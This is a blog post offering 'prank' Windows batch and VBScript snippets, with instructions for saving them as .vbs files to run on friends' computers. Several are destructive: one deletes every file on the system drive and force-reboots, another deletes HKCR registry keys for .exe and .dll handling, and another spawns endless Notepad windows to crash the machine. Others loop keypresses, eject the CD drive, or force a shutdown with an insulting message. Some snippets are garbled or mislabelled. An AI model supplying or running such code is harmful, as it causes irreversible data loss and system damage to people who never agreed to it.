After a few searches on the internet, I found that there are a few “.vbs” commands that you should avoid executing. Why does this bother anyone? Well there are sometimes you had download some archive file from the internet and accidentally execute all the stuffs in the file then something wrong happen to your machine. There are sometimes people trying to play pranks to your computer and you need to know it advance so that no one can do that to you.
Well, actually the above statement were just a mere rubbish. Who cares about executing it, while you can just restart the computer and everything goes back to normal. I guess.
Note :- The following in only for education purpose and please use it on your own risk.
To use the codes I am going to provide, all you need to do is to copy the codes and paste it in any notepad or text file, than save the text file with “anyname.vbs” , and make sure to change the file type during saving from “text file” to “all file type”. Well, as I said earlier, these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. This will DESTROY the computer so its up to you how you use it. Do not say that I do not warn you about this.
Executing “The Blue Screen Of Death”.vbs (do not play with these and think twice or maybe more before executing this file)
Code:
CODE @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00

Shutdown the computer code
This will prompt you with a funny message and shutdown the computer.
Code:
CODE @echo off msg * Fatal system error due to admin stupidity! shutdown -c “Error! You are too stupid!” -s -t 10

Delete Key Registry File
Note:- This is very dangerous and please use it at your own risk.
Code:
CODE @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE

Crazy Caps Lock
Constantly turns CapsLock on and of very fast until your keyboard burns to flame.. Just kidding. No Flames.
Code:
CODE
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK**”
loop

Endless Notepad
This will pop up endless notepads until the computer freezes and crashes
Code:
CODE @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

Endless Enter
This constantly makes it so the enter button is being pressed continuously.. no flames.
Code:
CODE Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop
Endless Backspace
This makes it so the backspace key is constantly being pressed
Code:
CODE
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs**”
loop
Popping CD-Drive
This will make the cd-drive constantly popping out.
Code:
CODE Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop

Well the above are some of the deadly “.vbs” code that I manage to found and remember so that I can play pranks with my friends and I would like to say use the codes at your own risk because some of them are very dangerous and may harm once computer. Maybe next time I will teach some of the coolest use of “.vbs” to your computer and make fun of the codes.
|
What To Do Next? Well start by having a drink on us and share this article. |
|
|
Related Posts Check out some more nice article and tutorial that you might like |












Leave a Reply
Some comment may need to be approved before showing